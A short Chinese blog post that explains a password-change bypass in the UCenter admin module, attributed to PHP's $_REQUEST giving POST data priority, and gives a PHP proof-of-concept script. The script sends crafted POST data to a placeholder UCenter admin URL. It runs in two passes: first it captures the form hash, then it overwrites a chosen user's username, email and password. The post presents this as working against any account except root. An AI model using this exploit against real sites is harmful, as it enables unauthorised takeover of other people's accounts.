当使用$_REQUEST全局变量接收数据时,PHP优先接收通过POST提交的数据, 由于这个原因UCenter过滤不严谨导致修改用户密码模块被绕过,现在通过一个简单的例子来说明,绕过的方法,可以PHP程序或HTML来实现,这里我用PHP来说明:
fSocket类: http://blog.csdn.net/jun54555/archive/2010/11/15/6010873.aspx
通过在前台获取用户的UID, 将其写入数组变量 $data中, 然后注释掉后五项, 然后
第一次运行:以获取表单的验证串:formhash以及用户相关信息,
第二次运行:去除数组变量 $data的元素注释,将用户要修改的信息和密码写入数组变量 $data中, 以修改用户密码
注:除了uid是root外, 其他任何用户都可以生效!
$f = new fSocket; $http_header =array( 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language: zh-cn,zh;q=0.5", "Accept-Encoding: gzip,deflate", "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7", "Keep-Alive: 115", "Connection: keep-alive", ); ######################### 登录验证 ################################## $data = array( 'uid' => '100035', 'a' => 'edit', //'formhash' => '673a2898c3b7d6d5', //'newusername' => 'cy', //'username' => 'ct', // 'password' => '04011217', // 'email' => 'jun54555@gmail.com' ); $option = array( 'ssl_enable' => false, 'ssl_verifypeer' => false, //依赖于ssl_enable 'http_header' => $http_header, 'cookie_enable' => true, 'cookiefile' => true, //依赖于cookie_enable 'cookiejar' => true, //依赖于cookie_enable //'referer' => "http://www.phpchina.com/", 'header' => false, 'returntransfer' => true, 'cookie_save_file'=> false, 'follow_location' => true, ); header("Content-Encoding: gzip"); $response = $f->send("http://www.xxx.org/uc_server//admin.php?m=user&a=login", "", $data, $option); //ucenter的后台地址 echo $response;
